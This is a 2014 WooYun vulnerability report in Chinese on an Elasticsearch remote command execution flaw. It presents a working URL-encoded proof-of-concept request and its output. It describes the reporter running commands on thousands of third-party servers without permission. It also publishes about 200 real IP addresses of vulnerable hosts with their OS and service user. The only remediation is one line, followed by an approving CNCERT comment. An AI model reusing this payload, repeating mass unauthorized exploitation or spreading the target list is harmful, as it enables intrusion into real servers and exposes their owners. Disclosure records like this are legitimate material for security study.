乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-06-25: 细节已通知厂商并且等待厂商处理中 2014-06-29: 厂商已经确认,细节仅向厂商公开 2014-07-09: 细节向核心白帽子及相关领域专家公开 2014-07-19: 细节向普通白帽子公开 2014-07-29: 细节向实习白帽子公开 2014-08-09: 细节向公众公开
2小时之内顺利在5000多台服务器上输出hello world. @cncert国家互联网应急中心
由于Elasticsearch命令执行漏洞,导致上万服务器受影响,截图所有ip无重复。2小时之内顺利在5000多台服务器上执行相关命令。
本次仅是技术测试漏洞影响范围,标题党了。国内测试700台集群服务器,成功了170多台。所有测试当中仅测试了1.4w ip成功率接近50%.
执行POC:
http://xx.xx.xx.xx:9200/_search?source={%22size%22:1,%22query%22:{%22filtered%22:{%22query%22:{%22match_all%22:{}}}},%22script_fields%22:{%22exp%22:{%22script%22:%22String%20str%3DSystem.getProperty(\%22os.name\%22)%2b\%22-\%22%2bSystem.getProperty(\%22user.name\%22);\%22[os:\%22%2bstr.toString()%2b\%22/]\%22;%22}}}
结果如下:
{"took":7,"timed_out":false,"_shards":{"total":5,"successful":5,"failed":0},"hits":{"total":140847,"max_score":1.0,"hits":[{"_index":"cai","_type":"loganalysis","_id":"f2bb7c30-ab55-11e3-9940-22000a9a8b23","_score":1.0,"fields":{"exp":"[os:Linux-ec2-user/]"}}]}}
返回了当前操作系统类型和当前用户运行Elasticsearch的用户名。国内受影响IP:
114.112.172.45:Linux-elasticsearch60.190.240.74:Linux-admin218.247.15.110:Linux-root119.254.106.156:Linux-root112.124.6.156:Linux-root112.65.228.5:Linux-yxtuser112.124.68.214:Linux-root183.129.178.138:Linux-admin123.127.114.28:Linux-root123.127.114.32:Linux-root114.113.156.235:Linux-root210.26.182.133:Windows Server 2008 R2-tlm183.60.244.17:Linux-admin124.248.40.56:Linux-elasticsearch115.29.160.208:Linux-elasticsearch222.180.136.70:Linux-logbase123.125.105.198:Linux-root59.175.153.24:Linux-root210.14.154.135:Linux-yada118.186.12.154:Linux-root219.232.240.226:Linux-spider210.34.4.113:Linux-neversion59.175.153.28:Linux-root115.29.221.214:Linux-root202.204.32.142:Windows Server 2008-Administrator42.96.147.212:Linux-elasticsearch210.192.125.137:Linux-elasticsearch114.80.158.118:Linux-webuser121.192.191.166:Linux-neversion166.111.135.27:Linux-elasticsearch219.223.190.244:Linux-root42.62.26.149:Linux-elasticsearch101.251.193.21:Linux-root218.200.15.238:Linux-root115.28.42.126:Linux-elasticsearch113.107.226.170:Linux-root218.205.65.249:Linux-admin210.14.137.102:Linux-elasticsearch111.11.197.146:Linux-root117.27.143.230:Linux-dev42.96.194.176:Linux-root115.29.188.127:Linux-elasticsearch115.29.145.164:Linux-elasticsearch210.26.182.134:Windows Server 2008 R2-tlm112.124.68.10:Linux-root210.192.125.141:Linux-elasticsearch101.251.193.22:Linux-root202.91.235.47:Linux-doit180.153.154.140:Linux-elasticsearch115.28.151.48:Linux-tomcat7218.108.129.141:Linux-www219.140.191.206:Linux-root210.14.154.136:Linux-yada203.195.193.90:Linux-elasticsearch61.164.118.194:Linux-root60.190.1.83:Windows Server 2008 R2-WIN-AR35FQEMOPC$202.194.7.250:Linux-root221.6.207.222:Linux-mota219.136.249.94:Linux-elasticsearch121.199.19.79:Linux-elasticsearch210.5.152.69:Linux-elasticsearch61.152.123.139:Linux-root115.29.32.56:Linux-root121.52.229.225:Linux-root122.224.243.172:Windows Server 2008 R2-IWEB12$222.192.61.8:Windows Server 2008 R2-WIN-KFLPLV06RH2$180.153.177.169:Windows Server 2008 R2-Administrator202.114.177.32:Linux-elasticsearch211.153.33.201:FreeBSD-root103.29.133.165:Linux-admin211.155.229.2:Linux-doit42.159.7.88:Linux-elasticsearch202.192.149.91:Linux-elasticsearch123.150.207.181:Linux-elasticsearch202.197.77.3:Linux-root114.80.158.119:Linux-webuser220.231.128.242:Linux-root114.80.158.117:Linux-webuser59.175.153.94:Linux-root124.207.188.72:Linux-elasticsearch121.52.232.27:Linux-admin202.99.230.148:Linux-elasticsearch210.32.158.117:Windows Server 2008-Administrator121.52.213.92:Linux-tankai222.192.61.9:Windows Server 2008 R2-WIN-FBH6CANACHV$175.102.33.122:Linux-root211.155.86.118:Linux-elasticsearch61.164.112.9:Linux-root210.73.221.26:Linux-elasticsearch124.127.201.53:Windows Server 2008 R2-Administrator118.193.128.202:Linux-root59.151.86.9:Windows Server 2008 R2-cobazaaradmin202.192.149.90:Linux-elasticsearch123.101.0.77:Linux-es218.94.42.3:Windows 2003-SYSTEM125.210.209.154:Linux-ec58.215.139.124:Linux-root121.199.41.168:Linux-site60.194.51.18:Linux-elasticsearch210.51.190.22:Linux-root180.153.224.122:Linux-root119.2.0.195:Linux-wubin166.111.7.105:Linux-aminer42.96.168.215:Linux-medium218.108.28.133:Linux-root121.199.31.235:Linux-elasticsearch124.207.188.106:Linux-elasticsearch112.124.103.71:Linux-elasticsearch121.199.14.195:Linux-elasticsearch183.129.160.157:Linux-root59.61.77.4:Linux-elasticsearch124.95.161.235:Linux-elasticsearch183.63.149.105:Linux-elasticsearch118.122.124.188:Linux-elasticsearch223.4.146.165:Windows Server 2008 R2-WHZD011249$210.34.4.74:Linux-badboy202.197.77.1:Linux-root124.207.188.104:Linux-elasticsearch218.17.162.90:Windows 2003-SYSTEM124.248.40.55:Linux-elasticsearch59.175.153.37:Linux-root42.62.30.204:Linux-elasticsearch121.194.2.202:Linux-elasticsearch62.141.60.253:Linux-elasticsearch59.106.177.123:Linux-elasticsearch85.158.182.229:Linux-elasticsearch162.243.52.4:Linux-elasticsearch50.97.245.37:Linux-data192.3.17.46:Linux-root46.252.21.82:Linux-elasticsearch95.128.179.92:Linux-elasticsearch54.199.202.180:Linux-elasticsearch54.72.186.95:Linux-elasticsearch184.69.206.134:Linux-elasticsearch107.170.149.193:Linux-elasticsearch138.91.191.171:Windows Server 2012-ECOSEARCH$77.120.101.131:Linux-elasticsearch95.85.30.247:Linux-elasticsearch62.210.239.230:Linux-elasticsearch23.253.35.234:Linux-elasticsearch85.25.100.198:Linux-elasticsearch162.243.6.243:Linux-elasticsearch115.28.153.62:Linux-ringtone82.95.165.31:Linux-elasticsearch54.204.149.163:Linux-elasticsearch206.221.150.100:Linux-elasticsearch218.241.236.109:Linux-lda199.80.52.216:Linux-elasticsearch62.210.215.14:Linux-elasticsearch46.36.216.71:Linux-elasticsearch54.255.38.134:Linux-deploy54.72.78.222:Linux-elasticsearch162.242.241.223:Linux-elasticsearch54.251.248.168:Linux-elasticsearch217.67.30.84:FreeBSD-elasticsearch89.31.96.201:Linux-elasticsearch151.236.216.20:Linux-elasticsearch95.142.163.212:Linux-elasticsearch23.253.125.187:Linux-elasticsearch208.94.234.177:Linux-elasticsearch162.243.37.251:Linux-elasticsearch178.33.253.101:Linux-julien178.211.56.101:Windows Server 2008 R2-WIN-ROLMAN9Q7K6$107.178.214.245:Linux-elasticsearch46.252.21.183:Linux-elasticsearch78.140.183.200:SunOS-root153.121.43.197:Linux-elasticsearch54.72.222.1:Linux-elasticsearch162.13.184.118:Linux-elasticsearch178.170.104.38:Linux-elasticsearch54.221.61.224:Linux-elasticsearch54.196.20.198:Linux-elasticsearch23.253.170.86:Linux-elasticsearch94.23.222.203:Linux-root
限制ip访问
危害等级:高
漏洞Rank:20
确认时间:2014-06-29 21:34
CNVD对该漏洞已经进行过一轮对政府部门的巡检,至27日,暂时只发现一例政府部门受影响案例。对于所述漏洞,已经由CNVD技术组单位知道创宇公司(zoomeye)协助完成对全网的检测,持续开展对重点用户的IP排查。对于批量检测,比较符合CNCERT全网应急的工作思路,鼓励。rank 20
暂无